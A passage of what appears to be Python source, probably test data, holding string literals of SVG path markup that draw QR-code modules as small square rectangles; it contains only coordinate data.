12 z M 9 2.4 L 9 3.0 L 9.6 3.0 L 9.6 2.4 z M 7.8 12 L 7.8 12.6 L 8.4 12.6 L 8.4 12 z M 12 2.4 L 12 3.0 L 12.6 3.0 L 12.6 2.4 z M 12.6 10.2 L 12.6 10.8 L 13.2 10.8 L 13.2 10.2 z M 12 13.8 L 12 14.4 L 12.6 14.4 L 12.6 13.8 z M 10.8 3.6 L 10.8 4.2 L 11.4 4.2 L 11.4 3.6 z M 10.2 8.4 L 10.2 9.0 L 10.8 9.0 L 10.8 8.4 z M 3.6 12.6 L 3.6 13.2 L 4.2 13.2 L 4.2 12.6 z M 13.2 8.4 L 13.2 9.0 L 13.8 9.0 L 13.8 8.4 z M 2.4 3 L 2.4 3.6 L 3.0 3.6 L 3.0 3 z M 3 9.6 L 3 10.2 L 3.6 10.2 L 3.6 9.6 z M 7.2 9.6 L 7.2 10.2 L 7.8 10.2 L 7.8 9.6 z M 5.4 10.8 L 5.4 11.4 L 6.0 11.4 L 6.0 10.8 z M 4.2 13.2 L 4.2 13.8 L 4.8 13.8 L 4.8 13.2 z M 7.2 13.2 L 7.2 13.8 L 7.8 13.8 L 7.8 13.2 z M 9 11.4 L 9 12.0 L 9.6 12.0 L 9.6 11.4 z M 7.8 13.8 L 7.8 14.4 L 8.4 14.4 L 8.4 13.8 z M 11.4 12 L 11.4 12.6 L 12.0 12.6 L 12.0 12 z M 10.8 7.2 L 10.8 7.8 L 11.4 7.8 L 11.4 7.2 z M 6 12 L 6 12.6 L 6.6 12.6 L 6.6 12 z M 9.6 7.2 L 9.6 7.8 L 10.2 7.8 L 10.2 7.2 z M 14.4 12 L 14.4 12.6 L 15.0 12.6 L 15.0 12 z M 13.2 2.4 L 13.2 3.0 L 13.8 3.0 L 13.8 2.4 z M 12.6 7.2 L 12.6 7.8 L 13.2 7.8 L 13.2 7.2 z M 14.4 4.2 L 14.4 4.8 L 15.0 4.8 L 15.0 4.2 z M 3.6 13.2 L 3.6 13.8 L 4.2 13.8 L 4.2 13.2 z M 13.2 11.4 L 13.2 12.0 L 13.8 12.0 L 13.8 11.4 z M 2.4 10.8 L 2.4 11.4 L 3.0 11.4 L 3.0 10.8 z M 3.6 9.6 L 3.6 10.2 L 4.2 10.2 L 4.2 9.6 z M 4.2 12.6 L 4.2 13.2 L 4.8 13.2 L 4.8 12.6 z M 6 10.8 L 6 11.4 L 6.6 11.4 L 6.6 10.8 z M 9 8.4 L 9 9.0 L 9.6 9.0 L 9.6 8.4 z M 12.6 6 L 12.6 6.6 L 13.2 6.6 L 13.2 6 z M 10.8 5.4 L 10.8 6.0 L 11.4 6.0 L 11.4 5.4 z M 9.6 10.2 L 9.6 10.8 L 10.2 10.8 L 10.2 10.2 z M 12.6 9 L 12.6 9.6 L 13.2 9.6 L 13.2 9 z M 11.4 2.4 L 11.4 3.0 L 12.0 3.0 L 12.0 2.4 z M 14.4 2.4 L 14.4 3.0 L 15.0 3.0 L 15.0 2.4 z M 2.4 9 L 2.4 9.6 L 3.0 9.6 L 3.0 9 z M 4.2 6 L 4.2 6.6 L 4.8 6.6 L 4.8 6 z M 3.6 3.6 L 3.6 4.2 L 4.2 4.2 L 4.2 3.6 z M 3 8.4 L 3 9.0 L 3.6 9.0 L 3.6 8.4 z M 7.2 6 L 7.2 6.6 L 7.8 6.6 L 7.8 6 z M 7.8 6.6 L 7.8 7.2 L 8.4 7.2 L 8.4 6.6 z M 6 4.8 L 6 5.4 L 6.6 5.4 L 6.6 4.8 z M 9 4.8 L 9 5.4 L 9.6 5.4 L 9.6 4.8 z M 8.4 4.8 L 8.4 5.4 L 9.0 5.4 L 9.0 4.8 z M 7.8 14.4 L 7.8 15.0 L 8.4 15.0 L 8.4 14.4 z M 12 4.8 L 12 5.4 L 12.6 5.4 L 12.6 4.8 z M 9.6 6.6 L 9.6 7.2 L 10.2 7.2 L 10.2 6.6 z M 2.4 13.2 L 2.4 13.8 L 3.0 13.8 L 3.0 13.2 z M 10.8 6 L 10.8 6.6 L 11.4 6.6 L 11.4 6 z M 9.6 13.2 L 9.6 13.8 L 10.2 13.8 L 10.2 13.2 z M 13.2 6 L 13.2 6.6 L 13.8 6.6 L 13.8 6 z M 2.4 5.4 L 2.4 6.0 L 3.0 6.0 L 3.0 5.4 z M 10.2 13.8 L 10.2 14.4 L 10.8 14.4 L 10.8 13.8 z M 14.4 5.4 L 14.4 6.0 L 15.0 6.0 L 15.0 5.4 z M 3 2.4 L 3 3.0 L 3.6 3.0 L 3.6 2.4 z M 2.4 7.2 L 2.4 7.8 L 3.0 7.8 L 3.0 7.2 z M 7.8 10.2 L 7.8 10.8 L 8.4 10.8 L 8.4 10.2 z M 7.2 4.2 L 7.2 4.8 L 7.8 4.8 L 7.8 4.2 z M 4.8 6 L 4.8 6.6 L 5.4 6.6 L 5.4 6 z M 6 3 L 6 3.6 L 6.6 3.6 L 6.6 3 z M 4.8 12.6 L 4.8 13.2 L 5.4 13.2 L 5.4 12.6 z M 10.8 9.6 L 10.8 10.2 L 11.4 10.2 L 11.4 9.6 z M 5.4 14.4 L 5.4 15.0 L 6.0 15.0 L 6.0 14.4 z M 9.6 4.8 L 9.6 5.4 L 10.2 5.4 L 10.2 4.8 z M 6 14.4 L 6 15.0 L 6.6 15.0 L 6.6 14.4 z M 8.4 14.4 L 8.4 15.0 L 9.0 15.0 L 9.0 14.4 z M 9 14.4 L 9 15.0 L 9.6 15.0 L 9.6 14.4 z M 11.4 7.8 L 11.4 8.4 L 12.0 8.4 L 12.0 7.8 z M 10.8 4.2 L 10.8 4.8 L 11.4 4.8 L 11.4 4.2 z M 10.2 7.8 L 10.2 8.4 L 10.8 8.4 L 10.8 7.8 z M 12 14.4 L 12 15.0 L 12.6 15.0 L 12.6 14.4 z M 13.2 9 L 13.2 9.6 L 13.8 9.6 L 13.8 9 z M 2.4 3.6 L 2.4 4.2 L 3.0 4.2 L 3.0 3.6 z M 12.6 12.6 L 12.6 13.2 L 13.2 13.2 L 13.2 12.6 z M 7.2 10.2 L 7.2 10.8 L 7.8 10.8 L 7.8 10.2 z M 4.8 7.2 L 4.8 7.8 L 5.4 7.8 L 5.4 7.2 z M 4.2 2.4 L 4.2 3.0 L 4.8 3.0 L 4.8 2.4 z M 3.6 7.2 L 3.6 7.8 L 4.2 7.8 L 4.2 7.2 z M 7.8 7.2 L 7.8 7.8 L 8.4 7.8 L 8.4 7.2 z M 8.4 11.4 L 8.4 12.0 L 9.0 12.0 L 9.0 11.4 z M 6 3.6 L 6 4.2 L 6.6 4.2 L 6.6 3.6 z M 7.8 13.2 L 7.8 13.8 L 8.4 13.8 L 8.4 13.2 z M 10.8 7.8 L 10.8 8.4 L 11.4 8.4 L 11.4 7.8 z M 6 12.6 L 6 13.2 L 6.6 13.2 L 6.6 12.6 z M 9.6 7.8 L 9.6 8.4 L 10.2 8.4 L 10.2 7.8 z M 3 14.4 L 3 15.0 L 3.6 15.0 L 3.6 14.4 z M 12.6 11.4 L 12.6 12.0 L 13.2 12.0 L 13.2 11.4 z M 12 12.6 L 12 13.2 L 12.6 13.2 L 12.6 12.6 z M 10.2 9.6 L 10.2 10.2 L 10.8 10.2 L 10.8 9.6 z M 14.4 9.6 L 14.4 10.2 L 15.0 10.2 L 15.0 9.6 z M 9.6 14.4 L 9.6 15.0 L 10.2 15.0 L 10.2 14.4 z M 2.4 11.4 L 2.4 12.0 L 3.0 12.0 L 3.0 11.4 z M 4.2 8.4 L 4.2 9.0 L 4.8 9.0 L 4.8 8.4 z M 3 10.8 L 3 11.4 L 3.6 11.4 L 3.6 10.8 z M 7.8 9 L 7.8 9.6 L 8.4 9.6 L 8.4 9 z M 5.4 2.4 L 5.4 3.0 L 6.0 3.0 L 6.0 2.4 z M 4.2 12 L 4.2 12.6 L 4.8 12.6 L 4.8 12 z M 8.4 2.4 L 8.4 3.0 L 9.0 3.0 L 9.0 2.4 z M 7.2 12 L 7.2 12.6 L 7.8 12.6 L 7.8 12 z M 6 11.4 L 6 12.0 L 6.6 12.0 L 6.6 11.4 z M 12 9 L 12 9.6 L 12.6 9.6 L 12.6 9 z M 10.8 8.4 L 10.8 9.0 L 11.4 9.0 L 11.4 8.4 z M 6 13.2 L 6 13.8 L 6.6 13.8 L 6.6 13.2 z M 9.6 10.8 L 9.6 11.4 L 10.2 11.4 L 10.2 10.8 z M 13.8 6 L 13.8 6.6 L 14.4 6.6 L 14.4 6 z M 13.2 3.6 L 13.2 4.2 L 13.8 4.2 L 13.8 3.6 z M 12.6 8.4 L 12.6 9.0 L 13.2 9.0 L 13.2 8.4 z M 10.2 11.4 L 10.2 12.0 L 10.8 12.0 L 10.8 11.4 z M 14.4 3 L 14.4 3.6 L 15.0 3.6 L 15.0 3 z M 3.6 14.4 L 3.6 15.0 L 4.2 15.0 L 4.2 14.4 z M 4.2 7.8 L 4.2 8.4 L 4.8 8.4 L 4.8 7.8 z M 3.6 4.2 L 3.6 4.8 L 4.2 4.8 L 4.2 4.2 z M 7.2 6.6 L 7.2 7.2 L 7.8 7.2 L 7.8 6.6 z M 4.8 3.6 L 4.8 4.2 L 5.4 4.2 L 5.4 3.6 z M 3.6 10.8 L 3.6 11.4 L 4.2 11.4 L 4.2 10.8 z M 6 5.4 L 6 6.0 L 6.6 6.0 L 6.6 5.4 z M 9 6.6 L 9 7.2 L 9.6 7.2 L 9.6 6.6 z M 8.4 5.4 L 8.4 6.0 L 9.0 6.0 L 9.0 5.4 z M 6 7.2 L 6 7.8 L 6.6 7.8 L 6.6 7.2 z M 10.8 12 L 10.8 12.6 L 11.4 12.6 L 11.4 12 z M 13.8 12 L 13.8 12.6 L 14.4 12.6 L 14.4 12 z M 12.6 2.4 L 12.6 3.0 L 13.2 3.0 L 13.2 2.4 z M 12 7.2 L 12 7.8 L 12.6 7.8 L 12.6 7.2 z M 2.4 13.8 L 2.4 14.4 L 3.0 14.4 L 3.0 13.8 z M 9.6 13.8 L 9.6 14.4 L 10.2 14.4 L 10.2 13.8 z M 2.4 6 L 2.4 6.6 L 3.0 6.6 L 3.0 6 z M 11.4 6 L 11.4 6.6 L 12.0 6.6 L 12.0 6 z M 14.4 6 L 14.4 6.6 L 15.0 6.6 L 15.0 6 z M 13.2 13.2 L 13.2 13.8 L 13.8 13.8 L 13.8 13.2 z M 4.2 4.8 L 4.2 5.4 L 4.8 5.4 L 4.8 4.8 z M 3.6 4.8 L 3.6 5.4 L 4.2 5.4 L 4.2 4.8 z M 7.8 9.6 L 7.8 10.2 L 8.4 10.2 L 8.4 9.6 z M 7.2 4.8 L 7.2 5.4 L 7.8 5.4 L 7.8 4.8 z M 8.4 9 L 8.4 9.6 L 9.0 9.6 L 9.0 9 z M 6 6 L 6 6.6 L 6.6 6.6 L 6.6 6 z M 5.4 6 L 5.4 6.6 L 6.0 6.6 L 6.0 6 z M 4.8 13.2 L 4.8 13.8 L 5.4 13.8 L 5.4 13.2 z M 9 3.6 L 9 4.2 L 9.6 4.2 L 9.6 3.6 z M 8.4 6 L 8.4 6.6 L 9.0 6.6 L 9.0 6 z M 12 3.6 L 12 4.2 L 12.6 4.2 L 12.6 3.6 z M 9.6 5.4 L 9.6 6.0 L 10.2 6.0 L 10.2 5.4 z M 12.6 4.2 L 12.6 4.8 L 13.2 4.8 L 13.2 4.2 z M 11.4 7.2 L 11.4 7.8 L 12.0 7.8 L 12.0 7.2 z M 10.8 2.4 L 10.8 3.0 L 11.4 3.0 L 11.4 2.4 z M 2.4 12 L 2.4 12.6 L 3.0 12.6 L 3.0 12 z M 9.6 12 L 9.6 12.6 L 10.2 12.6 L 10.2 12 z M 13.8 2.4 L 13.8 3.0 L 14.4 3.0 L 14.4 2.4 z M 13.2 7.2 L 13.2 7.8 L 13.8 7.8 L 13.8 7.2 z M 2.4 4.2 L 2.4 4.8 L 3.0 4.8 L 3.0 4.2 z M 4.2 10.8 L 4.2 11.4 L 4.8 11.4 L 4.8 10.8 z M 4.8 7.8 L 4.8 8.4 L 5.4 8.4 L 5.4 7.8 z M 4.2 4.2 L 4.2 4.8 L 4.8 4.8 L 4.8 4.2 z M 3.6 7.8 L 3.6 8.4 L 4.2 8.4 L 4.2 7.8 z M 7.8 11.4 L 7.8 12.0 L 8.4 12.0 L 8.4 11.4 z M 5.4 9.6 L 5.4 10.2 L 6.0 10.2 L 6.0 9.6 z M 4.8 4.8 L 4.8 5.4 L 5.4 5.4 L 5.4 4.8 z M 4.2 14.4 L 4.2 15.0 L 4.8 15.0 L 4.8 14.4 z M 8.4 9.6 L 8.4 10.2 L 9.0 10.2 L 9.0 9.6 z M 7.2 14.4 L 7.2 15.0 L 7.8 15.0 L 7.8 14.4 z M 6 4.2 L 6 4.8 L 6.6 4.8 L 6.6 4.2 z M 7.8 12.6 L 7.8 13.2 L 8.4 13.2 L 8.4 12.6 z M 11.4 13.2 L 11.4 13.8 L 12.0 13.8 L 12.0 13.2 z M 10.8 10.8 L 10.8 11.4 L 11.4 11.4 L 11.4 10.8 z M 13.8 8.4 L 13.8 9.0 L 14.4 9.0 L 14.4 8.4 z M 11.4 11.4 L 11.4 12.0 L 12.0 12.0 L 12.0 11.4 z M 10.2 9 L 10.2 9.6 L 10.8 9.6 L 10.8 9 z M 3.6 12 L 3.6 12.6 L 4.2 12.6 L 4.2 12 z M 2.4 2.4 L 2.4 3.0 L 3.0 3.0 L 3.0 2.4 z M 12.6 13.8 L 12.6 14.4 L 13.2 14.4 L 13.2 13.8 z M 4.8 10.8 L 4.8 11.4 L 5.4 11.4 L 5.4 10.8 z M 8.4 3 L 8.4 3.6 L 9.0 3.6 L 9.0 3 z M 7.2 12.6 L 7.2 13.2 L 7.8 13.2 L 7.8 12.6 z M 6 9.6 L 6 10.2 L 6.6 10.2 L 6.6 9.6 z M 10.8 14.4 L 10.8 15.0 L 11.4 15.0 L 11.4 14.4 z M 4.8 14.4 L 4.8 15.0 L 5.4 15.0 L 5.4 14.4 z M 9 9.6 L 9 10.2 L 9.6 10.2 L 9.6 9.6 z M 13.8 14.4 L 13.8 15.0 L 14.4 15.0 L 14.4 14.4 z M 12.6 4.8 L 12.6 5.4 L 13.2 5.4 L 13.2 4.8 z M 6.6 7.8 L 6.6 8.4 L 7.2 8.4 L 7.2 7.8 z M 11.4 12.6 L 11.4 13.2 L 12.0 13.2 L 12.0 12.6 z M 6 13.8 L 6 14.4 L 6.6 14.4 L 6.6 13.8 z M 9.6 11.4 L 9.6 12.0 L 10.2 12.0 L 10.2 11.4 z M 13.2 4.2 L 13.2 4.8 L 13.8 4.8 L 13.8 4.2 z M 12.6 7.8 L 12.6 8.4 L 13.2 8.4 L 13.2 7.8 z M 14.4 3.6 L 14.4 4.2 L 15.0 4.2 L 15.0 3.6 z M 13.2 10.8 L 13.2 11.4 L 13.8 11.4 L 13.8 10.8 z M 4.2 7.2 L 4.2 7.8 L 4.8 7.8 L 4.8 7.2 z M 3.6 2.4 L 3.6 3.0 L 4.2 3.0 L 4.2 2.4 z M 4.8 4.2 L 4.8 4.8 L 5.4 4.8 L 5.4 4.2 z M 7.8 5.4 L 7.8 6.0 L 8.4 6.0 L 8.4 5.4 z" id="qr-path" style="fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:none"></path></svg>"""
rs = """<svg height="34.8mm" version="1.1" viewBox="0 0 34.8 34.8" width="34.8mm" xmlns="http://www.w3.org/2000/svg"><path d="M 24 12 L 24 13.2 L 25.2 13.2 L 25.2 12 z M 21.6 25.2 L 21.6 26.4 L 22.8 26.4 L 22.8 25.2 z M 19.2 6 L 19.2 7.2 L 20.4 7.2 L 20.4 6 z M 16.8 25.2 L 16.8 26.4 L 18.0 26.4 L 18.0 25.2 z M 4.8 28.8 L 4.8 30.0 L 6.0 30.0 L 6.0 28.8 z M 24 15.6 L 24 16.8 L 25.2 16.8 L 25.2 15.6 z M 21.6 9.6 L 21.6 10.8 L 22.8 10.8 L 22.8 9.6 z M 26.4 9.6 L 26.4 10.8 L 27.6 10.8 L 27.6 9.6 z M 20.4 25.2 L 20.4 26.4 L 21.6 26.4 L 21.6 25.2 z M 6 12 L 6 13.2 L 7.2 13.2 L 7.2 12 z M 4.8 16.8 L 4.8 18.0 L 6.0 18.0 L 6.0 16.8 z M 26.4 27.6 L 26.4 28.8 L 27.6 28.8 L 27.6 27.6 z M 14.4 10.8 L 14.4 12.0 L 15.6 12.0 L 15.6 10.8 z M 10.8 14.4 L 10.8 15.6 L 12.0 15.6 L 12.0 14.4 z M 9.6 4.8 L 9.6 6.0 L 10.8 6.0 L 10.8 4.8 z M 16.8 14.4 L 16.8 15.6 L 18.0 15.6 L 18.0 14.4 z M 15.6 4.8 L 15.6 6.0 L 16.8 6.0 L 16.8 4.8 z M 16.8 13.2 L 16.8 14.4 L 18.0 14.4 L 18.0 13.2 z M 24 8.4 L 24 9.6 L 25.2 9.6 L 25.2 8.4 z M 12 16.8 L 12 18.0 L 13.2 18.0 L 13.2 16.8 z M 19.2 12 L 19.2 13.2 L 20.4 13.2 L 20.4 12 z M 27.6 21.6 L 27.6 22.8 L 28.8 22.8 L 28.8 21.6 z M 25.2 7.2 L 25.2 8.4 L 26.4 8.4 L 26.4 7.2 z M 4.8 25.2 L 4.8 26.4 L 6.0 26.4 L 6.0 25.2 z M 21.6 6 L 21.6 7.2 L 22.8 7.2 L 22.8 6 z M 28.8 15.6 L 28.8 16.8 L 30.0 16.8 L 30.0 15.6 z M 26.4 15.6 L 26.4 16.8 L 27.6 16.8 L 27.6 15.6 z M 4.8 9.6 L 4.8 10.8 L 6.0 10.8 L 6.0 9.6 z M 28.8 9.6 L 28.8 10.8 L 30.0 10.8 L 30.0 9.6 z M 14.4 22.8 L 14.4 24.0 L 15.6 24.0 L 15.6 22.8 z M 9.6 16.8 L 9.6 18.0 L 10.8 18.0 L 10.8 16.8 z M 8.4 7.2 L 8.4 8.4 L 9.6 8.4 L 9.6 7.2 z M 7.2 12 L 7.2 13.2 L 8.4 13.2 L 8.4 12 z M 15.6 21.6 L 15.6 22.8 L 16.8 22.8 L 16.8 21.6 z M 14.4 7.2 L 14.4 8.4 L 15.6 8.4 L 15.6 7.2 z M 12 4.8 L 12 6.0 L 13.2 6.0 L 13.2 4.8 z M 9.6 24 L 9.6 25.2 L 10.8 25.2 L 10.8 24 z M 18 4.8 L 18 6.0 L 19.2 6.0 L 19.2 4.8 z M 15.6 24 L 15.6 25.2 L 16.8 25.2 L 16.8 24 z M 24 4.8 L 24 6.0 L 25.2 6.0 L 25.2 4.8 z M 25.2 20.4 L 25.2 21.6 L 26.4 21.6 L 26.4 20.4 z M 24 27.6 L 24 28.8 L 25.2 28.8 L 25.2 27.6 z M 21.6 7.2 L 21.6 8.4 L 22.8 8.4 L 22.8 7.2 z M 20.4 16.8 L 20.4 18.0 L 21.6 18.0 L 21.6 16.8 z M 7.2 25.2 L 7.2 26.4 L 8.4 26.4 L 8.4 25.2 z M 26.4 16.8 L 26.4 18.0 L 27.6 18.0 L 27.6 16.8 z M 4.8 6 L 4.8 7.2 L 6.0 7.2 L 6.0 6 z M 6 19.2 L 6 20.4 L 7.2 20.4 L 7.2 19.2 z M 14.4 19.2 L 14.4 20.4 L 15.6 20.4 L 15.6 19.2 z M 10.8 21.6 L 10.8 22.8 L 12.0 22.8 L 12.0 21.6 z M 8.4 26.4 L 8.4 27.6 L 9.6 27.6 L 9.6 26.4 z M 14.4 26.4 L 14.4 27.6 L 15.6 27.6 L 15.6 26.4 z M 18 22.8 L 18 24.0 L 19.2 24.0 L 19.2 22.8 z M 15.6 27.6 L 15.6 28.8 L 16.8 28.8 L 16.8 27.6 z M 22.8 24 L 22.8 25.2 L 24.0 25.2 L 24.0 24 z M 21.6 14.4 L 21.6 15.6 L 22.8 15.6 L 22.8 14.4 z M 12 24 L 12 25.2 L 13.2 25.2 L 13.2 24 z M 19.2 14.4 L 19.2 15.6 L 20.4 15.6 L 20.4 14.4 z M 28.8 24 L 28.8 25.2 L 30.0 25.2 L 30.0 24 z M 26.4 4.8 L 26.4 6.0 L 27.6 6.0 L 27.6 4.8 z M 25.2 14.4 L 25.2 15.6 L 26.4 15.6 L 26.4 14.4 z M 28.8 8.4 L 28.8 9.6 L 30.0 9.6 L 30.0 8.4 z M 7.2 26.4 L 7.2 27.6 L 8.4 27.6 L 8.4 26.4 z M 26.4 22.8 L 26.4 24.0 L 27.6 24.0 L 27.6 22.8 z M 4.8 21.6 L 4.8 22.8 L 6.0 22.8 L 6.0 21.6 z M 7.2 19.2 L 7.2 20.4 L 8.4 20.4 L 8.4 19.2 z M 8.4 25.2 L 8.4 26.4 L 9.6 26.4 L 9.6 25.2 z M 12 21.6 L 12 22.8 L 13.2 22.8 L 13.2 21.6 z M 18 16.8 L 18 18.0 L 19.2 18.0 L 19.2 16.8 z M 25.2 12 L 25.2 13.2 L 26.4 13.2 L 26.4 12 z M 21.6 10.8 L 21.6 12.0 L 22.8 12.0 L 22.8 10.8 z M 19.2 20.4 L 19.2 21.6 L 20.4 21.6 L 20.4 20.4 z M 25.2 18 L 25.2 19.2 L 26.4 19.2 L 26.4 18 z M 22.8 4.8 L 22.8 6.0 L 24.0 6.0 L 24.0 4.8 z M 28.8 4.8 L 28.8 6.0 L 30.0 6.0 L 30.0 4.8 z M 4.8 18 L 4.8 19.2 L 6.0 19.2 L 6.0 18 z M 8.4 12 L 8.4 13.2 L 9.6 13.2 L 9.6 12 z M 7.2 7.2 L 7.2 8.4 L 8.4 8.4 L 8.4 7.2 z M 6 16.8 L 6 18.0 L 7.2 18.0 L 7.2 16.8 z M 14.4 12 L 14.4 13.2 L 15.6 13.2 L 15.6 12 z M 15.6 13.2 L 15.6 14.4 L 16.8 14.4 L 16.8 13.2 z M 12 9.6 L 12 10.8 L 13.2 10.8 L 13.2 9.6 z M 18 9.6 L 18 10.8 L 19.2 10.8 L 19.2 9.6 z M 16.8 9.6 L 16.8 10.8 L 18.0 10.8 L 18.0 9.6 z M 15.6 28.8 L 15.6 30.0 L 16.8 30.0 L 16.8 28.8 z M 24 9.6 L 24 10.8 L 25.2 10.8 L 25.2 9.6 z M 19.2 13.2 L 19.2 14.4 L 20.4 14.4 L 20.4 13.2 z M 4.8 26.4 L 4.8 27.6 L 6.0 27.6 L 6.0 26.4 z M 21.6 12 L 21.6 13.2 L 22.8 13.2 L 22.8 12 z M 19.2 26.4 L 19.2 27.6 L 20.4 27.6 L 20.4 26.4 z M 26.4 12 L 26.4 13.2 L 27.6 13.2 L 27.6 12 z M 4.8 10.8 L 4.8 12.0 L 6.0 12.0 L 6.0 10.8 z M 20.4 27.6 L 20.4 28.8 L 21.6 28.8 L 21.6 27.6 z M 28.8 10.8 L 28.8 12.0 L 30.0 12.0 L 30.0 10.8 z M 6 4.8 L 6 6.0 L 7.2 6.0 L 7.2 4.8 z M 4.8 14.4 L 4.8 15.6 L 6.0 15.6 L 6.0 14.4 z M 15.6 20.4 L 15.6 21.6 L 16.8 21.6 L 16.8 20.4 z M 14.4 8.4 L 14.4 9.6 L 15.6 9.6 L 15.6 8.4 z M 9.6 12 L 9.6 13.2 L 10.8 13.2 L 10.8 12 z M 12 6 L 12 7.2 L 13.2 7.2 L 13.2 6 z M 9.6 25.2 L 9.6 26.4 L 10.8 26.4 L 10.8 25.2 z M 21.6 19.2 L 21.6 20.4 L 22.8 20.4 L 22.8 19.2 z M 10.8 28.8 L 10.8 30.0 L 12.0 30.0 L 12.0 28.8 z M 19.2 9.6 L 19.2 10.8 L 20.4 10.8 L 20.4 9.6 z M 12 28.8 L 12 30.0 L 13.2 30.0 L 13.2 28.8 z M 16.8 28.8 L 16.8 30.0 L 18.0 30.0 L 18.0 28.8 z M 18 28.8 L 18 30.0 L 19.2 30.0 L 19.2 28.8 z M 22.8 15.6 L 22.8 16.8 L 24.0 16.8 L 24.0 15.6 z M 21.6 8.4 L 21.6 9.6 L 22.8 9.6 L 22.8 8.4 z M 20.4 15.6 L 20.4 16.8 L 21.6 16.8 L 21.6 15.6 z M 24 28.8 L 24 30.0 L 25.2 30.0 L 25.2 28.8 z M 26.4 18 L 26.4 19.2 L 27.6 19.2 L 27.6 18 z M 4.8 7.2 L 4.8 8.4 L 6.0 8.4 L 6.0 7.2 z M 25.2 25.2 L 25.2 26.4 L 26.4 26.4 L 26.4 25.2 z M 14.4 20.4 L 14.4 21.6 L 15.6 21.6 L 15.6 20.4 z M 9.6 14.4 L 9.6 15.6 L 10.8 15.6 L 10.8 14.4 z M 8.4 4.8 L 8.4 6.0 L 9.6 6.0 L 9.6 4.8 z M 7.2 14.4 L 7.2 15.6 L 8.4 15.6 L 8.4 14.4 z M 15.6 14.4 L 15.6 15.6 L 16.8 15.6 L 16.8 14.4 z M 16.8 22.8 L 16.8 24.0 L 18.0 24.0 L 18.0 22.8 z M 12 7.2 L 12 8.4 L 13.2 8.4 L 13.2 7.2 z M 15.6 26.4 L 15.6 27.6 L 16.8 27.6 L 16.8 26.4 z M 21.6 15.6 L 21.6 16.8 L 22.8 16.8 L 22.8 15.6 z M 12 25.2 L 12 26.4 L 13.2 26.4 L 13.2 25.2 z M 19.2 15.6 L 19.2 16.8 L 20.4 16.8 L 20.4 15.6 z M 6 28.8 L 6 30.0 L 7.2 30.0 L 7.2 28.8 z M 25.2 22.8 L 25.2 24.0 L 26.4 24.0 L 26.4 22.8 z M 24 25.2 L 24 26.4 L 25.2 26.4 L 25.2 25.2 z M 20.4 19.2 L 20.4 20.4 L 21.6 20.4 L 21.6 19.2 z M 28.8 19.2 L 28.8 20.4 L 30.0 20.4 L 30.0 19.2 z M 19.2 28.8 L 19.2 30.0 L 20.4 30.0 L 20.4 28.8 z M 4.8 22.8 L 4.8 24.0 L 6.0 24.0 L 6.0 22.8 z M 8.4 16.8 L 8.4 18.0 L 9.6 18.0 L 9.6 16.8 z M 6 21.6 L 6 22.8 L 7.2 22.8 L 7.2 21.6 z M 15.6 18 L 15.6 19.2 L 16.8 19.2 L 16.8 18 z M 10.8 4.8 L 10.8 6.0 L 12.0 6.0 L 12.0 4.8 z M 8.4 24 L 8.4 25.2 L 9.6 25.2 L 9.6 24 z M 16.8 4.8 L 16.8 6.0 L 18.0 6.0 L 18.0 4.8 z M 14.4 24 L 14.4 25.2 L 15.6 25.2 L 15.6 24 z M 12 22.8 L 12 24.0 L 13.2 24.0 L 13.2 22.8 z M 24 18 L 24 19.2 L 25.2 19.2 L 25.2 18 z M 21.6 16.8 L 21.6 18.0 L 22.8 18.0 L 22.8 16.8 z M 12 26.4 L 12 27.6 L 13.2 27.6 L 13.2 26.4 z M 19.2 21.6 L 19.2 22.8 L 20.4 22.8 L 20.4 21.6 z M 27.6 12 L 27.6 13.2 L 28.8 13.2 L 28.8 12 z M 26.4 7.2 L 26.4 8.4 L 27.6 8.4 L 27.6 7.2 z M 25.2 16.8 L 25.2 18.0 L 26.4 18.0 L 26.4 16.8 z M 20.4 22.8 L 20.4 24.0 L 21.6 24.0 L 21.6 22.8 z M 28.8 6 L 28.8 7.2 L 30.0 7.2 L 30.0 6 z M 7.2 28.8 L 7.2 30.0 L 8.4 30.0 L 8.4 28.8 z M 8.4 15.6 L 8.4 16.8 L 9.6 16.8 L 9.6 15.6 z M 7.2 8.4 L 7.2 9.6 L 8.4 9.6 L 8.4 8.4 z M 14.4 13.2 L 14.4 14.4 L 15.6 14.4 L 15.6 13.2 z M 9.6 7.2 L 9.6 8.4 L 10.8 8.4 L 10.8 7.2 z M 7.2 21.6 L 7.2 22.8 L 8.4 22.8 L 8.4 21.6 z M 12 10.8 L 12 12.0 L 13.2 12.0 L 13.2 10.8 z M 18 13.2 L 18 14.4 L 19.2 14.4 L 19.2 13.2 z M 16.8 10.8 L 16.8 12.0 L 18.0 12.0 L 18.0 10.8 z M 12 14.4 L 12 15.6 L 13.2 15.6 L 13.2 14.4 z M 21.6 24 L 21.6 25.2 L 22.8 25.2 L 22.8 24 z M 27.6 24 L 27.6 25.2 L 28.8 25.2 L 28.8 24 z M 25.2 4.8 L 25.2 6.0 L 26.4 6.0 L 26.4 4.8 z M 24 14.4 L 24 15.6 L 25.2 15.6 L 25.2 14.4 z M 4.8 27.6 L 4.8 28.8 L 6.0 28.8 L 6.0 27.6 z M 19.2 27.6 L 19.2 28.8 L 20.4 28.8 L 20.4 27.6 z M 4.8 12 L 4.8 13.2 L 6.0 13.2 L 6.0 12 z M 22.8 12 L 22.8 13.2 L 24.0 13.2 L 24.0 12 z M 28.8 12 L 28.8 13.2 L 30.0 13.2 L 30.0 12 z M 26.4 26.4 L 26.4 27.6 L 27.6 27.6 L 27.6 26.4 z M 8.4 9.6 L 8.4 10.8 L 9.6 10.8 L 9.6 9.6 z M 7.2 9.6 L 7.2 10.8 L 8.4 10.8 L 8.4 9.6 z M 15.6 19.2 L 15.6 20.4 L 16.8 20.4 L 16.8 19.2 z M 14.4 9.6 L 14.4 10.8 L 15.6 10.8 L 15.6 9.6 z M 16.8 18 L 16.8 19.2 L 18.0 19.2 L 18.0 18 z M 12 12 L 12 13.2 L 13.2 13.2 L 13.2 12 z M 10.8 12 L 10.8 13.2 L 12.0 13.2 L 12.0 12 z M 9.6 26.4 L 9.6 27.6 L 10.8 27.6 L 10.8 26.4 z M 18 7.2 L 18 8.4 L 19.2 8.4 L 19.2 7.2 z M 16.8 12 L 16.8 13.2 L 18.0 13.2 L 18.0 12 z M 24 7.2 L 24 8.4 L 25.2 8.4 L 25.2 7.2 z M 19.2 10.8 L 19.2 12.0 L 20.4 12.0 L 20.4 10.8 z M 25.2 8.4 L 25.2 9.6 L 26.4 9.6 L 26.4 8.4 z M 22.8 14.4 L 22.8 15.6 L 24.0 15.6 L 24.0 14.4 z M 21.6 4.8 L 21.6 6.0 L 22.8 6.0 L 22.8 4.8 z M 